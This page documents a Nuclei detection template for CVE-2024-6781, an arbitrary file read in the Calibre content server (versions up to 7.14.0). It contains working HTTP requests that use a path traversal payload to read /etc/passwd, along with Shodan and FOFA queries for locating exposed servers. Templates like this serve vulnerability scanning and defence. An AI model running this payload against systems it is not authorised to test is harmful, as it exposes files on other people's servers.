Calibre <= 7.14.0 Arbitrary File Read
ID: CVE-2024-6781
Severity: high
Author: DhiyaneshDK
Tags: cve,cve2024,calibre,lfi
Description
Section titled “Description”Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.
YAML Source
Section titled “YAML Source”id: CVE-2024-6781
info: name: Calibre <= 7.14.0 Arbitrary File Read author: DhiyaneshDK severity: high description: | Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0. reference: - https://starlabs.sg/advisories/24/24-6781/ classification: cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:* metadata: verified: true vendor: calibre-ebook product: calibre shodan-query: html:"Calibre" fofa-query: "Server: calibre" max-request: 2 tags: cve,cve2024,calibre,lfi
http: - raw: - | GET /interface-data/books-init HTTP/1.1 Host: {{Hostname}}
extractors: - type: json name: book_ids internal: true json: - '.search_result.book_ids[0]'
- raw: - | POST /cdb/cmd/export HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
["extra_file", {{book_ids}}, "../../../../../etc/passwd", ""]
matchers-condition: and matchers: - type: word part: content_type words: - "application/json"
- type: regex part: body regex: - 'root:.*:0:0:' - '"result":' condition: and
- type: status status: - 200# digest: 4a0a00473045022008ff3cb2a20d51421b9c81e8ad15e199ec5ae9cc6417f8ce4a0138c50e906359022100f56f461c3e69692610f15c127c86f4da3087a9fb81f6502aae258e03adac44bf:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-6781.yaml"